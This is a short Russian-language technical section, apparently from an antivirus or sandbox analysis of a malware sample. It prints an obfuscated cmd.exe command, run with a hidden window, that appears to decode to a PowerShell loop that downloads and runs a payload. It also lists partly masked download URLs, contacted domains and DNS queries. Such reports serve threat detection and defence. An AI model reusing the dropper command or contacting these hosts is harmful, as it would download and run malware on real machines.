Техническая информация
- '<SYSTEM32>\cmd.exe' /V^:^O/C"^s^e^t ^Q^o=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hct^ac^}^;^k^aerb;^j^a^G^$^ ^m^e^t^I^-^e^k^ovn^I^;)^j^aG^$^ ^,M^B^K^$(^e^l^i^F^d^a^oln^w^o^D^.^qv^i^$^{yr^t^{)cRr^$^ n^i ^MB^K^$(^h...
- 'he####cordova.com':80
- 'te##ark.com':80
- 'so###laslam.com':80
- 'li###lastie.fr':80
- 'ga###boyd.com':80
- http://he####cordova.com/nlapXvljXX
- http://so###laslam.com/b3Xndwh8Sf
- http://li###lastie.fr/wp-content/uploads/Zs4v61ezxs
- http://ga###boyd.com/9uhtilD3RC
- DNS ASK he####cordova.com
- DNS ASK te##ark.com
- DNS ASK so###laslam.com
- DNS ASK li###lastie.fr
- DNS ASK ga###boyd.com
- '<SYSTEM32>\cmd.exe' /V^:^O/C"^s^e^t ^Q^o=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hct^ac^}^;^k^aerb;^j^a^G^$^ ^m^e^t^I^-^e^k^ovn^I^;)^j^aG^$^ ^,M^B^K^$(^e^l^i^F^d^a^oln^w^o^D^.^qv^i^$^{yr^t^{)cRr^$^ n^i ^MB^K^$(^h...' (со скрытым окном)